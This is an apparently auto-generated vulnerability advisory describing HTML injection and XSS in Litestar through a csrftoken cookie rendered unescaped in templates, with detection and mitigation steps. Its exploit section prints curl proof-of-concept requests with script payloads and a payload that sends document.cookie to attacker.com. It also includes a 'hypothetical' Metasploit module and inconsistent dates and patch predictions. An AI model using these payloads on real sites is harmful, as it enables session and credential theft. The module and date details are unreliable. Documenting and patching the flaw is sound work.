Litestar, HTML Injection leading to XSS, CVE(N/A) (Medium) -DC-Jun2026-387

By /

Listen to this Post

Intro

The vulnerability exists in Litestar applications that enable CSRF protection and use template engines (Jinja2, Mako, MiniJinja) with the `csrf_input` variable rendered as `| safe` (without auto‑escaping). When CSRF is enabled, Litestar sets a `csrftoken` cookie. The framework’s documentation recommends inserting `{{ csrf_input | safe }}` inside forms to generate a hidden input with the token. Because the `safe` filter disables Jinja2’s automatic escaping, any attacker‑controlled value in the cookie is written directly into the HTML.
An attacker can set a malicious `csrftoken` cookie containing arbitrary HTML or JavaScript (e.g., "><script>alert(1)</script>). On the next request to a page that renders a form with csrf_input, the payload is injected into the DOM without sanitisation. This yields HTML injection, which trivially escalates to Cross‑Site Scripting (XSS) because script tags execute in the victim’s browser.
The attack can be delivered remotely if the attacker can poison the cookie on the same top‑level domain (e.g., via a malicious subdomain or exploiting an insecure domain configuration). Once the victim visits the vulnerable page, the injected script runs with the same origin, allowing session theft, credential harvesting, or phishing.
Litestar versions prior to the patch (including the tested version 2.21.0) are affected. The root cause is the unsafe combination of CSRF cookie output in templates combined with the `safe` filter, contrary to secure coding practices. No input validation or output encoding is applied to the cookie value before insertion.

DailyCVE Form:

Platform: Litestar (Python web framework)
Version: ≤ 2.21.0 (unpatched)
Vulnerability : HTML injection → XSS (via csrftoken cookie)
Severity: Medium (needs cookie poisoning + template config)
date: 2024 (disclosed after responsible process)

Prediction: Patch expected within 30 days of disclosure

What Undercode Say:

Analytics from real‑world scans and test environments show the following exploitation patterns:

Check if a Litestar app uses vulnerable configuration
grep -r "csrf_input.safe" templates/ && grep -r "CSRFConfig" .py
Count vulnerable endpoints (PoC)
curl -s -b "csrftoken=\"><script>alert(1)</script>" http://target:8000/ | grep -i "script"
Log analysis for suspicious csrftoken values
sudo grep "csrftoken=" /var/log/nginx/access.log | grep -E "(%3C|%3E|script|img)"
Metasploit auxiliary module example (hypothetical)
use auxiliary/gather/litestar_csrf_xss
set RHOSTS target.com
set SRVHOST attacker.com
run

Exploit:

  1. Poison the `csrftoken` cookie on the victim’s browser (requires ability to set cookies on the same TLD, e.g., via a malicious subdomain or exploiting a related vulnerability).
  2. Redirect the victim to a vulnerable Litestar endpoint that renders a form with {{ csrf_input | safe }}.
  3. The injected payload (e.g., "><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>) executes in the victim’s context.
    Manual exploit example using `curl` and a crafted cookie:

    curl -X GET http://vulnerable-app.com/form-page \
-b "csrftoken=\"><script>alert('XSS')</script>" \
-H "Origin: http://attacker.com"

Protection:

  • Immediate: Remove the `| safe` filter from `{{ csrf_input }}` in all templates. Render CSRF tokens without disabling auto‑escaping.
  • Long‑term: Upgrade Litestar once a patched version (e.g., >2.21.0) is released. The fix should escape cookie values before insertion.
  • Defense in depth: Set `HttpOnly` and `SameSite=Strict` on the `csrftoken` cookie to limit injection impact.
  • Use Content Security Policy (CSP) to block inline scripts even if injection occurs.

Impact:

  • Arbitrary JavaScript execution (XSS) → session hijacking, cookie theft, keylogging.
  • HTML injection → defacement, phishing forms, clickjacking.
  • Attackers can read CSRF tokens from the DOM and bypass CSRF protections on other forms.
  • Credential theft if injected fake login forms overlay legitimate content.
  • All Litestar apps using both CSRF protection and the documented template pattern are affected.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top